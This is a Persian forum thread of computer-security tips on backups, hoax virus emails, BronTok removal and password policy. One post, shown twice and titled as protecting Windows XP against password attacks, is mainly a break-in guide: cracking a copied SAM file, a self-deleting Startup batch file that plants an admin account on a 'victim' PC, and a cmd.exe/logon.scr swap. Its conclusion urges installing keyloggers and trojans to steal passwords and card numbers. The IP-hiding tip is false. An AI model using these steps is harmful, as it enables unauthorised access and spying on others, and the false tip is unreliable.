اکثر کاربران نسبت به گرفتن backup و مزایای آن آگاهی کامل دارند ولی تعداد زیادی از آنان هرگز این کار را انجام نمی دهند . برخی دیگر اولین backup را می گیرند ولی آن را به صورت مستمر و سازمان یافته ادامه نمی دهند .
با استفاده از برنامه های موجود در ویندوز نظیر Ntbackup.exe و یا سایر نرم افزارها ، می توان زمانبندی backup را بگونه ای انجام داد که این فرآیند بطور اتوماتیک انجام شود . داده backup را می بایست در یک سرویس دهنده دیگر شبکه و یا درایو removable و در مکانی متمایز از کامپیوتر فعلی نگهداری نمود .
بخاطر داشته باشید که داده مهمترین چیز برروی یک کامپیوتر است . سیستم عامل و سایر برنامه ها را می توان مجددا” نصب نمود ولی بازیابی داده اولیه مشکل و در بسیاری از موارد نیز غیرممکن است .
mozhgan
02-15-2011, 10:57 PM
مخفی کردن IP در برابر هکرها
در صورتی که تنها سررشته ای از هک و امنیت را داشته باشید میدانید که بسیاری از هکرها برای نفوذ به سیستم قربانی از IP او استفاده می کنند. با استفاده از این ترفند می توانید کاری کنید که IP شما برای همیشه دور از دسترس این افراد باشد و به نوعی به طور کامل IP خودتان را از دسترس دیگران مخفی نگه دارید.
برای این کار:
۱- ابتدا از منوی Start به Run رفته و در محیط Run عبارت MMC را تایپ نمایید.
۲- در محیط جدید ، از منوی File به قسمت Add/Remove Snap-in بروید.
۳- در پنجره باز شده بر روی دکمه Add کلیک کنید.
۴- در پنجره جدید ، بر روی IP Security Policy Management کلیک کرده و دکمه Add را بزنید.
۵- سپس Finish را زده و خارج شوید.
۶- در پنجره قبلی بر روی Ok کلیک کنید.
۷- حال در همان محیط اولیه هستید.آی کناری عبارت IP Security Policy Management زرد رنگ است. اکنون میبایست یکبار بر روی آن کلیک کنید تا رنگ آن به سبز تغییر پیدا کند.
۸- در پایان از منوی File به Exit رفته و با انتخاب yes این عملیات را ذخیره کنید.
mozhgan
02-15-2011, 10:59 PM
دیگر از طریق ایمیل ویروسی نشوید !!!
یکی از ساده ترین روشهای هکرها و ویروس نویسان ، استفاده از پست الکترونیکی یا ایمیل برای به خطر انداختن امنیت کاربران است. این روش هر اندازه که ساده صورت میگیرد به همان سادگی نیز قابل تشخیص است. چرا که تنها با متون خاص شما را ترقیب به دریافت فایل الصاقی یا کلیک روی یک لینک میکنند. در این ترفند قصد داریم دست این افراد را برای شما رو کنیم تا دیگر به ساده ترین شکل دچار مشکلات امنیتی نشوید.
یک مشکل بسیار گسترده در اینترنت وجود دارد و آن پیغامهای الکترونیکی که در مورد یک ویروس هشدار می دهند و این هشدار در مورد یک email با یک عنوان ( subject ) مشخص می باشد که این email ها ویروس های خطرناک هستند و به کامپیوتر شما آسیب می رسانند.
مثال:
Please do not open up any mail that has this title.
It will erase your whole hard drive. This is a new
e-mail virus and not a lot of people know about
it, just let everyone know, so they won’t be a victim.
Please forward this e-mail to you friends!!!
Remember the title: JOIN THE CREW.
مثال دیگر:
Subject: VIRUS WARNING VERY IMPORTANT
Please read the following message we received from a client.
If you receive an email titled “It Takes Guts to Say ‘Jesus’”
DO NOT open it. It will erase everything on your hard drive. So, you must delete it.
Forward this E-MAIL out to as many people as you can. This is a new, very
malicious virus and not many people know about it. This information was
announced yesterday morning from IBM; please share it with everyone
that might access the internet. Once again, pass this along to EVERYONE in
your address book so that this may be stopped. AOL has said that this is
a very dangerous virus and that there is NO remedy for it at this time.
Please practice cautionary measures.
اگر شما email ای مانند این دیدید آن را برای کسی نفرستید! ویروسهای “Jion The Crew” و “It Takes Guts to Say ‘Jesus’” شوخی هستند! ویروسهای شوخی دیگری وجود دارند مانند:
“Win a Hliday” , “AOL4Free” , “Pen Pal Greetings”, “ghost” , “Deeyenda”
و بد نام ترین آنها “Good times” است.
ویژگیهای اخطار ویروسهای شوخی:
تأکید بسیار
یک هشدار که ویروس فقط با باز کردن پیغام فعال می شود ( شما نمی توانید فقط با باز کردن یک پیفام آلوده شوید مگر اینکه یک پیوست ( attachment ) را باز کنید.
کلمات « این یک ویروس جدید است که بسیاری از مردم آن را نمی شناسند » در آن دیده می شود
دستور العملها به شما می گویند که با دنبال کردن یک لینک آن را برایکسانیکه می شناسید بفرستید.
با اشاره به اینکه ویروس روز قبل بوسیله یک شرکت یا گروه کامپیوتری معتبر مانند “IBM” یا “Microsoft’ و یا … اعلام شده است می خواهند هشدار خود موجه جلوه دهند.
در اینجا یک مثال از یک هشدار حقیقی در مورد ویروس وجود دارد:
Hi all,
There is a virus (a “worm”, actually) currently doing the rounds that
comes packaged in a file called PrettyPark.exe attached to an email.
Apparently it has been around since May last year, but has proliferated
recently and is currently by far the most “popular” subject of enquiries
at Symantec’s anti-virus research center.
The usual rules apply: don’t open it.
Information (including a fix if you are infected) is available at this
site:
http://www.symantec.com/avcenter/ven…park.worm.html
Good luck, Take care.
ویژگیهایی که نشان می دهند این ویروس مربوط به یک ویروس واقعی است عبارتند از :
پیغام به شکل ساده و زبان منطقی و مستدل بیان شده است ( بدون هیچگونه بزرگنمایی در لغات )
پیغام در مورد باز کردن یک بایل الصاقی ( attachment ) هشدار نی دهد
پیغام آدرس سایت معتبری را می دهد که در آن می توانید در مورد ویروس اطلاعات بیشتری پیدا کنید.
در پیغام اطلاعاتی در مورد اینکه اگر کامپیوتر شما آلوده به ویروس شد چه کار باید انجام دهید به شما اطلاعاتی میدهد.
در پیغام از شما خواسته نمی شود که آن را برای کسی بفرستید.
mozhgan
02-15-2011, 11:01 PM
چگونه از ویندوز XP خود در برابر حمله به کلمه عبور محافظت کنید
» روش اول :
در جایی که از شما UserName , Password پرسیده می شود کلید های Alt+Ctrl+Del را دو مرتبه همزمان فشار دهید . در قسمت UserName کلمه Administrator را وارد کرده و جای کلمه عبور را خالی بگذارید و Enter بزنید تا وارد ویندوز شوید …
خوب این روش ساده بود اما همیشه کارساز نیست اگر برای Administrator آن کلمه عبوری قرار داده شده باشد ؟!!
به سراغ روش دوم میرویم :
» روش دوم :
۱- ابتدا یک فلاپی Bootable می سازیم .
۲- اغلب فایل سیستم ویندوز XP,2000 از نوع NTFS است و در محیط شبیه Dos که با فلاپی راه اندازی میشود شناخته نمی شود بنا براین ما برای این کار نیاز به برنامه هایی مثل NTFS4DOS ( دانلود : http://users.cjb.net/mojtaba/ntfs4dos.zip ) داریم.(این نوع برنامه ها امکان کار کردن با درایو هایی که فایل سیستم آنها Ntfs را در dos به ما می دهد.)
۳- حالا که فلاپی آماده شد باید با آن سیستم را راه اندازی کرد… اما اگر در Setup سیستم تنظیم شده باشد که با فلاپی راه اندازی نشود …؟!! آنگاه باید به سراغ Setup رفت و در آن تنظیمات لازم را انجام دهیم اگر Setup با کلمه عبور محافظت شود آنگاه باید به Bios ( مقاله نفوذ به بایوس : لینک مقاله بایوس ) نفوذ کنیم.
۴- خوب پس از انجام مراحل فوق فلاپی را در فلاپی درایو قرار داده و سیستم را با آن راه اندازی می کنیم . و بر نامه NTFS4DOS را اجرا می کنیم تا به اطلاعات درایو های NTFS دسترسی داشته باشیم .
۵- درایوی که ویندوز در آن نصب است را پیدا می کنیم و به مسیر زیر رفته :
%Windir%System32Config
Example : c:windowssystem32config
در این پوشه فایلی به نام * sam را در فلاپی کپی می کنیم.
( نکته : در ویندوز ۲۰۰۰ با پاک کردن این فایل دیگر کار تمام است و میتوان با Username: Administrator و بدون پسورد وارد شویم اما میتوان برای این که رد پایی باقی نماند از فایل Sam یک کپی داشته باشیم تا بعد از انجام کارمان در ویندوز با برگرداندن این فایل به جای قبلی آن رد پای خود را پاک کنیم و نام و پسورد کاربران به حالت قبل برگردد.)
از این مرحله به بعد برای Windows Xp بیشتر توصیه میشود :
۶- بعد از کپی فایل با برنامه هایی نظیر L0phtCrack ,John the Ripper آن را کرک می کنیم تا پسورد را به دست آورد .
» روش سوم :
در این روش چهار مرحله اول روش دوم را انجام میدهیم.
۱- دستورات زیر را در Notepad می نویسیم و در فایلی با نام و پسوند test.bat ذخیره میکنیم :
echo off@
net user administrator 123 /add
net localgroup administrator administrators /add
net user administrator 123
del test.bat
echo on@
2- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپیوتر قربانی می رویم و فایلی که در مرحله قبل ساخته ایم را در مسیر زیر کپی می کنیم(به فرض که ویندوز در درایو C نصب باشد و کاربری با نام MOJTABA مدیر سیستم باشد):
C:Documents and SettingsMOJTABAStart MenuProgramsStartup
3- خوب حالا فقط کافی است که منتظر بمانید تا کاربر MOJTABA یک بار وارد شود دیگر تمام است و شما بعد از آن می توانید با نام کاربری Administrator و کلمه عبور ۱۲۳ وارد سیستم شوید.
توضیح دستورات مربوط به فایلی که میسازیم :
در خط اول این دستور باعث مخفی شدن بقیه دستورات در حال اجرا از دید کاربر می شود.
در خط دوم ما یک کاربر بانام Administrator و کلمه عبور ۱۲۳ می سازیم .(این عمل برای این صورت می گیرد که ممکن است نام Administrator را تغییر داده باشند).
در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.
در خط چهارم احتمال می دهیم که نام Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.
در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.
در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.
نکته : توجه کنید که به جای کاربر Administrator و کلمه عبور ۱۲۳ هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .
روش چهارم :
استفاده از برنامه Windows XP / 2000 / NT Key است . نسخه آزمایشی این برنامه را می توانید از اینجا دریافت کنید.
» روش پنجم ( البته این روش را من پیدا نکردم اما اشکالات آن را رفع کرده ام)
تا مرحله ۴ را انجام می دهیم حالا در Dos هستیم و دستورات را جلوی خط فرمان می نویسیم .
الف – ابتدا به درایوی می رویم که در آن ویندوز نصب شده است .برای مثال فرض کنیم در درایو C نصب باشد دستور زیر را اجرا می کنیم :
:c
ب – Windows/System32 میرویم .و در آنجا کارهای زیر را انجام می دهیم :
با دستور : cd windows/system32
پ – یک پوشه ایجاد می کنیم با دستور زیر :
md hack
ت – حالا دو فایل cmd.exe و logon.scr را به این پوشه کپی می کنیم تا یک نسخه پشتیبان از این فایل ها داشته باشیم با اجرای دستورات زیر :
copy cmd.exe hack
copy logon.scr hack
ث – حالا فایل logon.scr را پاک می کنیم :
del logon.scr
ج – حالا فایل cmd.exe را به logon.scr تغییر نام می دهیم :
ren cmd.exe logon.scr
حالا کافی است کامپیوتر را ریستارت کنید .
بعد از این که ویندوز بالا آمد ، اگر توجه کنید چند دقیقه که صبر کنید در حالت عادی Screen saver Logon.scr به اجرا در می آید اما با این دستکاری که ما کرده ایم Cmd.exe به اجرا در می آید حالا می توانید کاربر جدید ایجاد کنید و یا کلمه عبور را عوض کنید .
برای ایجاد حساب کاربری از دستور زیر استفاده می کنیم :
net user Mojtaba 123 /add
این دستور یک حساب کاربری با نام Mojtaba و کلمه عبور ۱۲۳ ایجاد می کند.
برای این که این کاربر را مدیر(Administrator) قرار دهیم دستور زیر را انجام می دهیم :
net localgroup Mojtaba administrators /add
حالا اگر یک حساب کاربری موجود باشد و بخواهیم پسورد اون رو عوض کنیم دستور زیر را انجام می دهیم :
net user Ali 123
این دستور بدون این که پسورد قبلی کاربر Ali را از ما بخواهد پسورد اون رو به ۱۲۳ تغییر می دهد.
ضمنا بعد از ورود به سیستم فایل هایی که در پوشه hack کپی کرده ایم را به جای قبلی برگردانید و پوشه hack را پاک کنید تا ردی باقی نماند .
———————————————— —————————————–نتی ه :
حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .
اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و …
دوم این که توصیه می شود یک برنامه جاسوسی مثل XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و … و وب سایت های که سر می زند و حتی کلماتی که چت می کند و … را بدانید ( در آینده نه چندان دور مقاله ای در مورد برنامه های جاسوسی خواهم نوشت ).
سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین …
چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .
پنجم …
توصیه های مهم :
۱- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .
۲- حداقل کاری که میتونین انجام بدین این است که سیستم شما با CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید.
۳- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.
۴- LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید.
۵- نام کاربری Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .
۶- اگر به کاربر Guest نیازی ندارید آن را غیر فعال کنید .
۷- هر چند وقت یکبار پسورد خود را عوض کنید.
۸- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید .
mozhgan
02-15-2011, 11:01 PM
چگونه از ویندوز XP خود در برابر حمله به کلمه عبور محافظت کنید
» روش اول :
در جایی که از شما UserName , Password پرسیده می شود کلید های Alt+Ctrl+Del را دو مرتبه همزمان فشار دهید . در قسمت UserName کلمه Administrator را وارد کرده و جای کلمه عبور را خالی بگذارید و Enter بزنید تا وارد ویندوز شوید …
خوب این روش ساده بود اما همیشه کارساز نیست اگر برای Administrator آن کلمه عبوری قرار داده شده باشد ؟!!
به سراغ روش دوم میرویم :
» روش دوم :
۱- ابتدا یک فلاپی Bootable می سازیم .
۲- اغلب فایل سیستم ویندوز XP,2000 از نوع NTFS است و در محیط شبیه Dos که با فلاپی راه اندازی میشود شناخته نمی شود بنا براین ما برای این کار نیاز به برنامه هایی مثل NTFS4DOS ( دانلود : (http://users.cjb.net/mojtaba/ntfs4dos.zip) ) داریم.(این نوع برنامه ها امکان کار کردن با درایو هایی که فایل سیستم آنها Ntfs را در dos به ما می دهد.)
۳- حالا که فلاپی آماده شد باید با آن سیستم را راه اندازی کرد… اما اگر در Setup سیستم تنظیم شده باشد که با فلاپی راه اندازی نشود …؟!! آنگاه باید به سراغ Setup رفت و در آن تنظیمات لازم را انجام دهیم اگر Setup با کلمه عبور محافظت شود آنگاه باید به Bios ( مقاله نفوذ به بایوس : لینک مقاله بایوس ) نفوذ کنیم.
۴- خوب پس از انجام مراحل فوق فلاپی را در فلاپی درایو قرار داده و سیستم را با آن راه اندازی می کنیم . و بر نامه NTFS4DOS را اجرا می کنیم تا به اطلاعات درایو های NTFS دسترسی داشته باشیم .
۵- درایوی که ویندوز در آن نصب است را پیدا می کنیم و به مسیر زیر رفته :
%Windir%System32Config
Example : c:windowssystem32config
در این پوشه فایلی به نام * sam را در فلاپی کپی می کنیم.
( نکته : در ویندوز ۲۰۰۰ با پاک کردن این فایل دیگر کار تمام است و میتوان با Username: Administrator و بدون پسورد وارد شویم اما میتوان برای این که رد پایی باقی نماند از فایل Sam یک کپی داشته باشیم تا بعد از انجام کارمان در ویندوز با برگرداندن این فایل به جای قبلی آن رد پای خود را پاک کنیم و نام و پسورد کاربران به حالت قبل برگردد.)
از این مرحله به بعد برای Windows Xp بیشتر توصیه میشود :
۶- بعد از کپی فایل با برنامه هایی نظیر L0phtCrack ,John the Ripper آن را کرک می کنیم تا پسورد را به دست آورد .
» روش سوم :
در این روش چهار مرحله اول روش دوم را انجام میدهیم.
۱- دستورات زیر را در Notepad می نویسیم و در فایلی با نام و پسوند test.bat ذخیره میکنیم :
echo off@
net user administrator 123 /add
net localgroup administrator administrators /add
net user administrator 123
del test.bat
echo on@
2- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپیوتر قربانی می رویم و فایلی که در مرحله قبل ساخته ایم را در مسیر زیر کپی می کنیم(به فرض که ویندوز در درایو C نصب باشد و کاربری با نام MOJTABA مدیر سیستم باشد):
C:Documents and SettingsMOJTABAStart MenuProgramsStartup
3- خوب حالا فقط کافی است که منتظر بمانید تا کاربر MOJTABA یک بار وارد شود دیگر تمام است و شما بعد از آن می توانید با نام کاربری Administrator و کلمه عبور ۱۲۳ وارد سیستم شوید.
توضیح دستورات مربوط به فایلی که میسازیم :
در خط اول این دستور باعث مخفی شدن بقیه دستورات در حال اجرا از دید کاربر می شود.
در خط دوم ما یک کاربر بانام Administrator و کلمه عبور ۱۲۳ می سازیم .(این عمل برای این صورت می گیرد که ممکن است نام Administrator را تغییر داده باشند).
در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.
در خط چهارم احتمال می دهیم که نام Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.
در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.
در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.
نکته : توجه کنید که به جای کاربر Administrator و کلمه عبور ۱۲۳ هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .
روش چهارم :
استفاده از برنامه Windows XP / 2000 / NT Key است . نسخه آزمایشی این برنامه را می توانید از اینجا دریافت کنید.
» روش پنجم ( البته این روش را من پیدا نکردم اما اشکالات آن را رفع کرده ام)
تا مرحله ۴ را انجام می دهیم حالا در Dos هستیم و دستورات را جلوی خط فرمان می نویسیم .
الف – ابتدا به درایوی می رویم که در آن ویندوز نصب شده است .برای مثال فرض کنیم در درایو C نصب باشد دستور زیر را اجرا می کنیم :
:c
ب – Windows/System32 میرویم .و در آنجا کارهای زیر را انجام می دهیم :
با دستور : cd windows/system32
پ – یک پوشه ایجاد می کنیم با دستور زیر :
md hack
ت – حالا دو فایل cmd.exe و logon.scr را به این پوشه کپی می کنیم تا یک نسخه پشتیبان از این فایل ها داشته باشیم با اجرای دستورات زیر :
copy cmd.exe hack
copy logon.scr hack
ث – حالا فایل logon.scr را پاک می کنیم :
del logon.scr
ج – حالا فایل cmd.exe را به logon.scr تغییر نام می دهیم :
ren cmd.exe logon.scr
حالا کافی است کامپیوتر را ریستارت کنید .
بعد از این که ویندوز بالا آمد ، اگر توجه کنید چند دقیقه که صبر کنید در حالت عادی Screen saver Logon.scr به اجرا در می آید اما با این دستکاری که ما کرده ایم Cmd.exe به اجرا در می آید حالا می توانید کاربر جدید ایجاد کنید و یا کلمه عبور را عوض کنید .
برای ایجاد حساب کاربری از دستور زیر استفاده می کنیم :
net user Mojtaba 123 /add
این دستور یک حساب کاربری با نام Mojtaba و کلمه عبور ۱۲۳ ایجاد می کند.
برای این که این کاربر را مدیر(Administrator) قرار دهیم دستور زیر را انجام می دهیم :
net localgroup Mojtaba administrators /add
حالا اگر یک حساب کاربری موجود باشد و بخواهیم پسورد اون رو عوض کنیم دستور زیر را انجام می دهیم :
net user Ali 123
این دستور بدون این که پسورد قبلی کاربر Ali را از ما بخواهد پسورد اون رو به ۱۲۳ تغییر می دهد.
ضمنا بعد از ورود به سیستم فایل هایی که در پوشه hack کپی کرده ایم را به جای قبلی برگردانید و پوشه hack را پاک کنید تا ردی باقی نماند .
نتیجه :
حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .
اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و …
دوم این که توصیه می شود یک برنامه جاسوسی مثل XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و … و وب سایت های که سر می زند و حتی کلماتی که چت می کند و … را بدانید ( در آینده نه چندان دور مقاله ای در مورد برنامه های جاسوسی خواهم نوشت ).
سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین …
چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .
پنجم …
توصیه های مهم :
۱- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .
۲- حداقل کاری که میتونین انجام بدین این است که سیستم شما با CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید.
۳- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.
۴- LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید.
۵- نام کاربری Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .
۶- اگر به کاربر Guest نیازی ندارید آن را غیر فعال کنید .
۷- هر چند وقت یکبار پسورد خود را عوض کنید.
۸- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید .
mozhgan
02-15-2011, 11:09 PM
پاک کردن ویروسی که Folder Option را حذف می کند !
شیوه ی پاک کردن ویروس BronTok.A :
در زیر به برخی از ویژگی های این ویروس اشاره می کنیم :
۱ . Folder Options را حذف می کند !
۲ . Registry Tools را قفل می کند !
۳ . Task Manager نمی تواند فایل های مربوط به این ویروس را End کند !
۴ . پس از اجرا شدن ، محتویات My Documents را نمایش می دهد !
۵ . اگر در کادر محاوره ای Run عبارت CMD ، Regedit ، msconfig ، Regedt32 را تایپ کنید ، سیستم بلافاصله Restart می شود !
۶ . اگر روی گزینه ی Log Off یا Turn Off Computer کلیک کنید ، سیستم Restart می شود !
۷ . آی این ویروس شبیه آی یه پوشه است !
همانطور که می دانید فایل های lsass.exe ، winlogon.exe و services.exe از فایل های سیستمی بوده و همیشه در حال اجرا هستند …
اگر شما برنامه ی Process Master را اجرا کنید ، می بینید که این فایل ها در پوشه ی System32 قرار دارند .
اما اگر ویروس BronTok.A روی سیستم شما نصب باشد ، خواهید دید که سه تا فایل دیگر با همین نام ها در حال اجرا هستند !!
یعنی دو تا winlogon.exe ، دو تا lsass.exe و دو تا services.exe !
اما به راحتی میشود فهمید که کدام ویروسند و کدام فایل اصلی ویندوز …
آن سه تا فایلی که مربوط به ویروس میشوند ، در پوشه ای غیر از System32 قرار دارند .
مسیر دقیقشان میشود :
C:Documents and SettingsUserLocal SettingsApplication Data
C نام همان درایویست که ویندوز در آن نصب گردیده و User نام کاربری است که ویروس در آن اجرا شده …
بعد از اینکه با نرم افزار Process Master متوجه شدید که کدام ویروسند ، باید آن ها رو Kill process کنید .
اگر احیانا فایل های دیگری با نام های inetinfo.exe ، csrss.exe و smss.exe نیز در حال اجرا بودند آنها را هم Kill process کنید .البته به شرطی که مسیرشان غیر از
System32 باشد …
حالا وقت آن است که از نرم افزار Kill BronTok.A استفاده کنید .
پس از اینکه نرم افزار Kill BronTok.A کارش تمام شد ، آن را ببندید و به منوی Start برید و روی گزینه ی Search کلیک کنید .
در سمت چپ روی گزینه ی All files and folders کلیک کنید .
در فیلد All or part of the file name عبارت Empty.pif را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .اکنون تمام فایل های پیدا شده را پاک کنید .
دوباره در فیلد مذکور عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
scr،*.exe.*
اکنون از بین فایل های پیدا شده ، هر فایلی که آیش شبیه آی پوشه بود رو پاک کنید .
مجددا در فیلد All or part of the file name عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
job.*
تمام فایل های پیدا شده را پاک کنید .
باز هم در فیلد فوق الذکر عبارت Bron را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
اکنون تمام فایل ها و پوشه های پیدا شده را پاک کنید .
اکنون با خیال راحت کامپیوترتان را Restart کنید .
نکته :
اگر ویندوزتان بیشتر از یک کاربر دارد ، باید تمام عملیات فوق را در همه ی کاربرها انجام دهید .
mozhgan
02-15-2011, 11:09 PM
روش شناسایی ویروس
در این مقاله شما با چگونگی تشخیص فایل های آلوده به ویروس یا تروجان آشنا میشوید
شاید بسیار برای شما پیش آمده باشد که فایلی را از کسی دریافت کنید و با وجود آنتی ویروس سیستم شما آلوده شود این به این دلیل است که آنتی ویروس های مختلف یک تروجان یا ویروس را در یک زمان شناسایی نمیکنند و ممکن است یک تروجان را نود۳۲ امروز شناسایی کند ولی همان تروجان را کسپر یک هفته بعد شناسایی کند
برای رفع این مشکل از سایت
virusscan.jotti.org
استفاده میکنیم این سایت یک فایل را با ۱۵ “آنتی ویروس مطرح دنیا به طور همزمان اسکن میکند و نتیجه را در یک جدول به شما گزارش میکند
۱-دکمه Brows را زده و فایل مورد نظر را وارد کنید
۲- برای شروع عملیات اسکن بر روی دکمه Submit کلیک کنید
۳- بعد اتمام اسکن نتیجه را به صورت زیر مشاهده میکنیدوهمان طور کی میبینید تنها سه آنتی ویروس قادر به شناسایی فایل مذکور بودند .
mozhgan
02-15-2011, 11:11 PM
انتخاب و محافظت از کلمات عبور
کلمات عبور بخش مهمی از امنیت کامپیوتر هستند و در حقیقت در خط مقدم حفاظت از اکانت کاربران قرار می گیرند. یک کلمه عبور نامناسب ممکن است منجر به سوءاستفاده از کل شبکه شود. بهمین دلیل تمام کارمندان شامل پیمانکاران و فروشندگان که به سیستم شرکت دسترسی دارند مسوول انتخاب کلمه عبور مناسب و محافظت از آن هستند.
در این مقاله به نکاتی در مورد ایجاد کلمات عبور قوی و محافظت از آنها و زمان انقضاء و تغییر آنها اشاره می شود. در حقیقت مخاطب این مقاله تمام افرادی هستند که مسوول اکانت یا هر سیستمی هستند که از طریق آن به شبکه یا اطلاعات غیرعمومی دسترسی دارند.
سیاست کلی
· تمام کلمات عبور در سطح سیستم باید حداقل سه ماه یکبار عوض شوند.
· تمام کلمات عبور سطح کاربر (مانند ایمیل یا کامپیوتر) باید هر شش ماه تغییر کنند که البته تغییر چهار ماهه توصیه می شود.
· اکانتهای کاربری که مجوزهای سطح سیستم دارند باید کلمات عبوری داشته باشند که با کلمات عبور دیگر اکانتهای آن کاربر متفاوت باشد.
· کلمات عبور نباید در ایمیلها یا سایر شکلهای ارتباطات الکترونیکی درج شوند.
· باید رهنمونهای زیر در تمام کلمات عبور سطح سیستم و سطح کاربر رعایت شود.
راهنماییها
راهنمایی کلی ساخت کلمه عبور
کلمات عبور برای اهداف گوناگونی در شرکتها استفاده می شوند. تعدادی از استفاده های معمول اینها هستند:
· اکانتهای سطح کاربر
· اکانتهای دسترسی به وب
· اکانتهای ایمیل
· حفاظت از مونیتور
· کلمه عبور صندوق پستی
· ورود به روتر محلی
چون سیستمهای بسیار کمی از نشانه های یکبارمصرف استفاده می کنند (مانند کلمات عبور دینامیک که فقط یکبار استفاده می شوند)، هرکسی باید از نحوه انتخاب کلمات عبور مناسب آگاه باشد.
کلمات عبور ضعیف معمولا مشخصات زیر را دارند:
· کلمه عبور شامل کمتر از هشت حرف است.
· کلمه عبور کلمه ای است که در یک فرهنگ لغت یافت می شود.
· کلمه عبور کلمه ای است که کاربرد عمومی دارد مانند:
o نام خانوادگی، حیوانات اهلی، دوستان، همکاران، شخصیت های خیالی و غیره
o نامها و اصطلاحات کامپیوتری، فرمانها، سایتها، شرکتها، سخت افزار و نرم افزار.
o نام شرکت یا کلمات مشتق شده از این نام.
o تاریخ های تولد و سایر اطلاعات شخصی مانند آدرس ها و شماره های تلفن.
o الگوهای کلمات یا شماره ها مانند aaabbb، qwerty، zyxwvuts، ۱۲۳۳۲۱ و غیره.
o هرکدام از عبارات فوق بطور برعکس.
o هرکدام از عبارات فوق که تنها با یک رقم شروع یا به آن ختم می شود.
کلمات عبور مناسب مشخصات زیر را دارند:
· شامل هم حروف کوچک و هم بزرگ هستند (a-z و A-Z)
· علاوه بر حروف از ارقام و نشانه ها هم در آنها استفاده می شود مانند ۰-۹ و !@#$%^&*()_+|~=’{}[];<>?./
· حداقل هشت حرف دارند.
· کلمه ای در هیچ زبان، گویش یا صنف خاص نیستند.
· برپایه اطلاعات شخصی، اسم یا فامیل نیستند.
· کلمات عبور هرگز نباید نوشته یا جایی ذخیره شوند. سعی کنید کلمات عبوری انتخاب کنید که بتوانید براحتی در ذهن داشته باشید. یک روش انجام این کار، ایجاد کلمه عبور بر پایه یک ترانه یا عبارت است. برای مثال عبارت “This May Be One Way To Remember” و کلمه عبور می تواند “TmB1w2R!” یا “Tmb1W>r~” یا انواع دیگری از همین الگو باشد.
توجه: این مثالها را بعنوان کلمه عبور استفاده نکنید.
استانداردهای حفاظت از کلمه عبور
از کلمات عبور مشترک برای اکانتهای شرکت و دسترسی های شخصی استفاده نکنید. تا جایی ممکن است، از کلمه عبور مشترک برای نیازهای مختلف شرکت استفاده نکنید. برای مثال، برای سیستمهای مهندسی یک کلمه عبور انتخاب کنید و یک کلمه عبور دیگر برای سیستمهای IT . همچنین برای استفاده از اکانتهای NT و UNIX کلمات عبور متفاوت انتخاب کنید.
کلمات عبور شرکت با هیچ کس از جمله دستیاران و منشی ها در میان نگذارید. باید با تمام کلمات عبور بصورت اطلاعات حساس و محرمانه برخورد شوند.
در اینجا به لیستی از “انجام ندهید ”ها اشاره می شود.
· کلمه عبور را از طریق تلفن به هیچ کس نگویید.
· کلمه عبور را از طریق ایمیل فاش نکنید.
